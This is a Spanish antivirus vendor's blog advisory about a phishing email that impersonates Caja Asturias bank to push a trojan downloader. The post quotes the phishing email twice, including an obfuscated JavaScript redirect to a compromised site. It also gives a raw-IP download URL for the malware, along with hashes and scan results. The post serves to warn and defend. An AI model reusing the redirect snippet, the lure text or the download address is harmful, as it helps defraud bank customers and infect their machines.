Nuevo malware que llega en falso mail de CAJA ASTURIAS
Otro mail con descarga de un fichero malware:
mail malicioso:
_______________
——– Mensaje original ——– Asunto: sistema de seguridad cajastur.
Fecha: Thu, 14 Jun 2012 10:42:51 +0200
De: <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sat@satinfo.es”>sat@satinfo.es>
En CajAstur tenemos la consciencia de la necesidad de garantizar el tránsito de la información entre el banco y nuestros clientes. Por esta razón, Banco cajastur cuenta con las máximas medidas de seguridad para poder garantizar la confidencialidad de las
comunicaciones entre el banco y el cliente. No obstante, esas medidas pueden cambiar sin notificación, con la finalidad de proteger sus datos personales. Este correo
le ha sido enviado automaticamente por nuestro sistema, como notificación de los cambios efectuados en el sistema. Para seguir utilizando nuestros servicios de Banca por internet de cajastur, debes instalar el nuevo sistema de seguridad para poder
efectuar sus operaciones normalmente.
Acceda al enlace que hemos puesto a su disposición [ LINK ]. <—- link malicioso
NOTA: Recuerde que no podrás operar en Banco cajastur sin instalar el sistema, es muy importante su utilización. Si la instalación no se realiza dentro de 48h su cuenta será suspendida temporalmente hasta que su registro se haya completado.
Todos los Derechos Reservados 2012© CajAstur
____________
mail malicioso:
_______________
——– Mensaje original ——– Asunto: sistema de seguridad cajastur.
Fecha: Thu, 14 Jun 2012 10:42:51 +0200
De: <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sat@satinfo.es”>sat@satinfo.es>
En CajAstur tenemos la consciencia de la necesidad de garantizar el tránsito de la información entre el banco y nuestros clientes. Por esta razón, Banco cajastur cuenta con las máximas medidas de seguridad para poder garantizar la confidencialidad de las
comunicaciones entre el banco y el cliente. No obstante, esas medidas pueden cambiar sin notificación, con la finalidad de proteger sus datos personales. Este correo
le ha sido enviado automaticamente por nuestro sistema, como notificación de los cambios efectuados en el sistema. Para seguir utilizando nuestros servicios de Banca por internet de cajastur, debes instalar el nuevo sistema de seguridad para poder
efectuar sus operaciones normalmente.
Acceda al enlace que hemos puesto a su disposición [ LINK ]. <—- link malicioso
NOTA: Recuerde que no podrás operar en Banco cajastur sin instalar el sistema, es muy importante su utilización. Si la instalación no se realiza dentro de 48h su cuenta será suspendida temporalmente hasta que su registro se haya completado.
Todos los Derechos Reservados 2012© CajAstur
____________
fin del mail
El link malicioso descarga de http://95.97.35.194/intrawebnet.asp?cajastur.es/
el fichero cjstur.exe , cuyo analisis en virustotal, indica:
El link malicioso descarga de http://95.97.35.194/intrawebnet.asp?cajastur.es/
el fichero cjstur.exe , cuyo analisis en virustotal, indica:
SHA256: 7bfba59e3931dcc3745df4b93446b0d6195966825740c48b84c7c45699ceafce
SHA1: 487b8550d73a13f9c5a82c660f239d4712c760c2
MD5: 97bddc2c810bdbdcc3361849509186ca
Tamaño: 603.0 KB ( 617472 bytes )
Nombre: cjstur.exe
Tipo: Win32 EXE
Detecciones: 6 / 42
Fecha de análisis: 2012-06-14 12:39:51 UTC ( hace 2 minutos )
01Más detalles
Antivirus Resultado Actualización
AhnLab-V3 – 20120613
AntiVir – 20120614
Antiy-AVL – 20120614
Avast – 20120614
AVG unknown virus Win32/DH{ICIjJVdn} 20120614
BitDefender Gen:Variant.Barys.64 20120614
ByteHero – 20120613
CAT-QuickHeal – 20120614
ClamAV – 20120614
Commtouch – 20120614
Comodo – 20120614
DrWeb – 20120614
Emsisoft Trojan-Downloader.Win32.Genome!IK 20120614
eSafe – 20120614
F-Prot – 20120614
F-Secure Gen:Variant.Barys.64 20120614
Fortinet – 20120614
GData Gen:Variant.Barys.64 20120614
Ikarus Trojan-Downloader.Win32.Genome 20120614
Jiangmin – 20120614
K7AntiVirus – 20120613
Kaspersky – 20120614
McAfee – 20120614
McAfee-GW-Edition – 20120613
Microsoft – 20120614
NOD32 – 20120614
Norman – 20120613
nProtect – 20120614
Panda – 20120614
PCTools – 20120614
Rising – 20120614
Sophos – 20120614
SUPERAntiSpyware – 20120614
Symantec – 20120614
TheHacker – 20120614
TotalDefense – 20120613
TrendMicro – 20120614
TrendMicro-HouseCall – 20120613
VBA32 – 20120614
VIPRE – 20120614
ViRobot – 20120614
VirusBuster – 20120613
Lo pasamos a monitorizar e implementaremos su control y eliminacion en el proximo ELISTARA 25.69, que estará disponible en nuestra web a partir de las 9 h CEST
saludos
ms, 14-6-2012
NOTA: Como siempre, ecordamos que no debe ejecutarse ningun fichero anezado a un mail no solicitados, ni pulsar en enlaces o imagens de los mismos…
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.